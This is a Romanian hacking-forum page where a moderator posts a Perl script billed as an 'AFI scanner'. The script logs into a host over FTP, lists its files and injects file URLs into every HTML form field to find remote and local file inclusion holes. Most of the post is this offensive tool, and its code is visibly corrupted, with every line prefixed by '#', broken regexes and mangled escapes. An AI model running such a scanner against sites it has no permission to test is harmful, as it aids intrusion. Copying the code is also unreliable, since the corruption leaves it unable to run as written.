EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie:
ionela24 Profile
 | Femeie
24 ani
Prahova
cauta Barbat
25 - 47 ani |
|
r3v
Moderator
 Inregistrat: acum 15 ani
Postari: 1158
|
|
Code:
#
###################################################################################
#
#
#
# Author: darkjoker
#
#
#
# Site: http://darkjokerside.altervista.org
#
#
#
# Program: AFI scanner
#
#
#
# Usage: perl afi_scanner.pl <hostname> <ftp_username> <ftp_password> <test_file>
#
#
#
# <hostname>: Hostname where you want to do scan.
#
#
#
# <ftp_username>: FTP username of specific hostname.
#
#
#
# <ftp_password>: FTP password of specific hostname.
#
#
#
# <test_file>: File you want to include (syntax: http://site/file
#
# if you want to scan LFI please use a file in same directory of
#
# scanned files.
#
#
#
###################################################################################
#
#
#!/usr/bin/perl
#
#
use IO::Socket;
#
use Net::FTP;
#
#
sub usage {
#
die "Usage: perl $0 <hostname> <ftp_username> <ftp_password> <test_file>\n";
#
}
#
$host = shift or usage;
#
$ftp_user = shift or usage;
#
$ftp_pass = shift or usage;
#
$test_file = shift or usage;
#
#
$ftp = Net::FTP->new ($host) or die "$!\n";
#
$ftp->login ($ftp_user, $ftp_pass) or die "$!\n";
#
@files = $ftp->ls();
#
$ftp->quit();
#
$test_file =~ /http://(.+?)(/.+)/;
#
$test_host = $1;
#
$test_page = $2;
#
my $sock = new IO::Socket::INET (
#
PeerHost => $test_host,
#
PeerPort => '80',
#
Proto => 'tcp',
#
) or die "$!\n";
#
print $sock "GET $test_page\r\n\r\n";
#
my ($test);
#
while (<$sock>){
#
$test .= $_;
#
}
#
close ($sock);
#
foreach (@files){
#
my (@vars);
#
my (@methods);
#
$file = $_;
#
my $sock = new IO::Socket::INET (
#
PeerHost => $host,
#
PeerPort => '80',
#
Proto => 'tcp',
#
) or die "$!\n";
#
print $sock "GET /".$file."\r\n\r\n";
#
while (<$sock>){
#
chomp ($_);
#
$page .= $_;
#
}
#
while ($page =~ /<form.+?method.+?('|")(.+?)('|")/){
#
$method = $2;
#
$page =~ /<form.+?>(.+?)<\/form>/;
#
$in = $1;
#
while ($in =~ /(input|textarea).+?name.+?('|")(.+?)('|")/){
#
$var_name = $3;
#
push (@vars, $var_name);
#
push (@methods, $method);
#
$in =~ s/<(input|textarea).+?>//;
#
}
#
$page =~ s/<form.+?>//;
#
}
#
close ($sock);
#
$cont = 0;
#
#
while ($cont < scalar (@vars)){
#
my $sock = new IO::Socket::INET (
#
PeerHost => $host,
#
PeerPort => '80',
#
Proto => 'tcp',
#
);
#
if ($test_file =~ /$host/){
#
$test_page =~ /(.+)\/(.+)/;
#
$to_include = $2;
#
}
#
else {
#
$to_include = $test_file;
#
}
#
if (@methods [$cont] =~ /GET/){
#
print $sock "GET /".$file."?" [$cont]."=".$to_include."\r\n\r\n";
#
}
#
elsif (@methods [$cont] =~ /POST/){
#
$var = @vars [$cont] . "=".$to_include;
#
print $sock "POST /".$file."\n".
#
"Host: $host\n".
#
"Content-Type: application/x-www-form-urlencoded\n".
#
"Content-Length: ".length($var)."\n\n".
#
$var."\n\n";
#
}
#
else {
#
die $file . " -> " [$cont] . ": Unknow method.\n";
#
}
#
my ($res);
#
while (<$sock>){
#
$res .= $_;
#
}
#
if ($res =~ /$test/){
#
if ($test_host =~ /^$host$/){
#
print $file . ": Probably LFI on '" . @vars [$cont] . "' variable.\n";
#
}
#
else {
#
print $file . ": Probably RFI on '" . @vars [$cont] . " variable.n";
#
}
#
}
#
$cont++;
#
close ($sock);
#
}
#
}
#
print "nDonen"; |
_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin
|
|
| pus acum 15 ani |
|